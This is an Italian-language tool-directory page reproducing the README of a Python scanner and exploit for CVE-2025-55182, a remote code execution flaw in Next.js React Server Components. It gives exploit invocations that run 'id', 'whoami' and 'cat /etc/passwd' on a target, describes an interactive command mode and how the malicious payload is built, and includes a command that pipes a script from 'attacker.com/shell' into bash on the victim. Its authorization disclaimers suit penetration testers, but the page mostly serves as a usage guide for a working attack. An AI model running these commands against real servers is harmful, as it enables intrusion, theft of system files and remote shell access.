Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei **React Server Components (RSC)** nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE. | Kitploit
Strumenti/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
Scanner di VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei **React Server Components (RSC)** nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
18 mesi faNon ancora revisionato

RSC Detector - Scanner di vulnerabilità dei React Server Components

Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei React Server Components (RSC) nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE.

⚠️ AVVERTENZA: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre un'autorizzazione scritta prima di effettuare test.


Funzionalità

✅ Rilevamento passivo - Analizza HTML, header e struttura delle pagine per individuare indicatori RSC
✅ Fingerprinting attivo - Invia header specifici RSC per rilevare le risposte del server
✅ Analisi degli header HTTP - Identifica gli header relativi a Next.js e RSC
✅ Sfruttamento RCE - Esegue comandi su server vulnerabili (se sfruttabile)
✅ Output colorato nel terminale - Feedback visivo migliorato per una migliore leggibilità
✅ Modalità interattiva - Esegui più comandi in modalità di sfruttamento
✅ Decodifica robusta - Gestisce payload compressi gzip e payload binari


Installazione

Prerequisiti

  • Python 3.8+
  • pip (gestore di pacchetti Python)

Configurazione

  1. Clona il repository

    root@kitploit:~
    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Installa le dipendenze

    root@kitploit:~
    pip install -r requirements.txt
    

    Pacchetti richiesti:

    • requests>=2.28.0 - Libreria client HTTP
    • urllib3>=1.26.0 - Utility HTTP avanzate
    • colorama>=0.4.6 - Colori del terminale (compatibile con Windows)
    • beautifulsoup4 - Parsing HTML

Utilizzo

Rilevamento di base (senza sfruttamento)

root@kitploit:~
python rsc_detector.py https://example.com

Scansione completa con sfruttamento

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Esegui un comando specifico

root@kitploit:~
python rsc_detector.py https://example.com --exploit --cmd "whoami"

Modalità di sfruttamento interattiva

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Quindi inserisci i comandi al prompt (digita quit per uscire).


Opzioni della riga di comando

OpzioneDescrizione
<URL>URL del target (obbligatorio). Antepone automaticamente https:// se mancante
--exploit

Esempi

Rileva la vulnerabilità RSC:

root@kitploit:~
python rsc_detector.py https://target.com

Sfrutta ed esegui il comando id:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "id"

Sfrutta ed esegui il comando cat /etc/passwd:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

Modalità interattiva (più comandi):

root@kitploit:~
python rsc_detector.py https://target.com --exploit

Come funziona

1. Scansione passiva

  • Verifica la presenza del marcatore window.__next_f (Next.js App Router)
  • Rileva il Content-Type text/x-component
  • Cerca i marcatori del React Flight Protocol
  • Analizza __NEXT_DATA__ e le importazioni Next.js

2. Analisi degli header

  • Esamina gli header Server, Vary e X-Nextjs-Cache
  • Identifica se il server supporta RSC negli header HTTP

3. Fingerprinting attivo

  • Invia richieste con header RSC: 1
  • Analizza la risposta del server agli header specifici RSC
  • Rileva la struttura del React Flight Protocol

4. Sfruttamento RCE

  • Costruisce payload JSON dannosi che sfruttano la serializzazione dei React Server Component
  • Invia dati multipart/form-data per attivare l'esecuzione di codice lato server
  • Decodifica l'output dei comandi codificato in base64
  • Supporta risposte compresse gzip

Output e risultati

Risultati del rilevamento

root@kitploit:~
[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible

Output dello sfruttamento

root@kitploit:~
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root

Dettagli della vulnerabilità

CVE-2025-55182 sfrutta:

  • React Server Component (RSC): difetti di serializzazione
  • Next.js Server Action: vulnerabilità di deserializzazione
  • Object prototype pollution tramite payload dannosi
  • Iniezione di comandi tramite child_process.execSync()

Superficie di attacco

  • Applicazioni Next.js che utilizzano App Router
  • Server Components con input controllati dall'utente
  • Applicazioni con RSC abilitato ma non adeguatamente validato

Linee guida legali ed etiche

⚠️ Importante

Questo strumento è RIGOROSAMENTE RISERVATO A TEST DI SICUREZZA AUTORIZZATI:

  1. ✅ DA FARE: Usa su sistemi di tua proprietà o con autorizzazione scritta al test
  2. ✅ DA FARE: Segnala le vulnerabilità in modo responsabile al fornitore
  3. ✅ DA FARE: Segui le pratiche di divulgazione responsabile
  4. ❌ DA NON FARE: Usare su sistemi senza autorizzazione
  5. ❌ DA NON FARE: Usare per scopi dannosi
  6. ❌ DA NON FARE: Archiviare o eseguire dati sensibili

L'accesso non autorizzato a sistemi informatici è illegale ai sensi di:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act 1990 - UK
  • Leggi simili nella maggior parte dei paesi

Divulgazione responsabile

Se scopri una vulnerabilità utilizzando questo strumento:

  1. NON divulgarla pubblicamente finché il fornitore non ha applicato la patch
  2. Contatta direttamente il team di sicurezza del fornitore
  3. Concedi 90 giorni per lo sviluppo della patch
  4. Coordina con il fornitore i tempi della divulgazione
  5. Accreditati negli advisory dopo la divulgazione

Risoluzione dei problemi

Errori del certificato SSL

Lo strumento ignora la verifica SSL per impostazione predefinita. Per abilitarla:

root@kitploit:~
detector = RSCDetector(url, verify_ssl=True)

Errori di decodifica Base64

Lo strumento automaticamente:

  • Aggiunge padding alle stringhe base64 malformate
  • Rileva e decomprime i payload gzip
  • Ripiega sui caratteri di sostituzione UTF-8 per i dati binari

Nessuna chiave "digest" nella risposta

  • Il target potrebbe non essere vulnerabile
  • Il server potrebbe filtrare il payload dell'exploit
  • Prova test manuali o endpoint diversi

Problemi di timeout

Aumenta il timeout nel codice:

root@kitploit:~
response = self.session.get(self.url, timeout=30)  # 30 seconds

Struttura del progetto

root@kitploit:~
CVE-2025-55182/
├── README.md                # This file
├── requirements.txt         # Python dependencies
├── rsc_detector.py         # Main scanner & exploit engine
├── rsc_cli.py              # CLI utilities (if present)
├── script.py               # Additional scripts (if present)
├── COLOR_GUIDE.md          # Color output documentation
└── .gitignore              # Git ignore rules

Dipendenze

root@kitploit:~
requests>=2.28.0         # HTTP requests
urllib3>=1.26.0          # Advanced HTTP
beautifulsoup4>=4.11.0   # HTML parsing
colorama>=0.4.6          # Terminal colors (Windows)

Installa tutto in una volta:

root@kitploit:~
pip install -r requirements.txt

Suggerimenti per le prestazioni

  • Accelera il rilevamento: Salta il flag --exploit se stai solo scansionando
  • Test batch: Crea uno script per scansionare più URL
  • Timeout di rete: Regola i valori di timeout per reti lente
  • Bypass SSL: La verifica è disabilitata per impostazione predefinita per maggiore flessibilità

Utilizzo avanzato

Esecuzione di comandi personalizzati

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"

Reindirizzamento dell'output

root@kitploit:~
python rsc_detector.py https://target.com > scan_results.txt 2>&1

Scansione batch

root@kitploit:~
for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done

Limitazioni

  • ⚠️ Funziona solo su configurazioni Next.js vulnerabili
  • ⚠️ Richiede RSC abilitato sull'applicazione target
  • ⚠️ Alcuni server potrebbero filtrare o bloccare i payload di exploit
  • ⚠️ L'output binario potrebbe non essere visualizzato correttamente nel terminale
  • ⚠️ L'esecuzione dei comandi dipende dai permessi del server

Contributi

Hai trovato un bug o vuoi proporre un miglioramento? I contributi sono benvenuti!

  1. Fai il fork del repository
  2. Crea un branch per la funzionalità (git checkout -b feature/improvement)
  3. Committa le tue modifiche (git commit -am 'Add feature')
  4. Esegui il push del branch (git push origin feature/improvement)
  5. Invia una Pull Request

Dichiarazione di esclusione di responsabilità

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.

Licenza

Questo progetto è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.


Riferimenti

  • Documentazione dei React Server Components
  • Next.js App Router
  • CVE-2025-55182 (Quando disponibile)
  • OWASP: Injection Flaws

Contatti e supporto

  • Segnalazione vulnerabilità: Usa la divulgazione responsabile
  • Problemi di sicurezza: Non pubblicarli pubblicamente; contatta direttamente i manutentori
  • Richieste di funzionalità: Apri una issue su GitHub

Autore

Creato per la ricerca sulla sicurezza e i test di penetrazione autorizzati.

Ultimo aggiornamento: 19 dicembre 2025


Registro delle modifiche

v1.0.0

  • ✅ Rilevamento RSC passivo
  • ✅ Fingerprinting attivo
  • ✅ Sfruttamento RCE
  • ✅ Output colorato nel terminale
  • ✅ Modalità di sfruttamento interattiva
  • ✅ Supporto alla decompressione gzip
  • ✅ Decodifica base64 robusta

Ricorda: Da un grande potere derivano grandi responsabilità. Usa questo strumento in modo etico e legale.

Scarica lo strumento
Abilita lo sfruttamento RCE dopo il rilevamento
--cmd <command>Esegue un comando specifico (da usare con --exploit)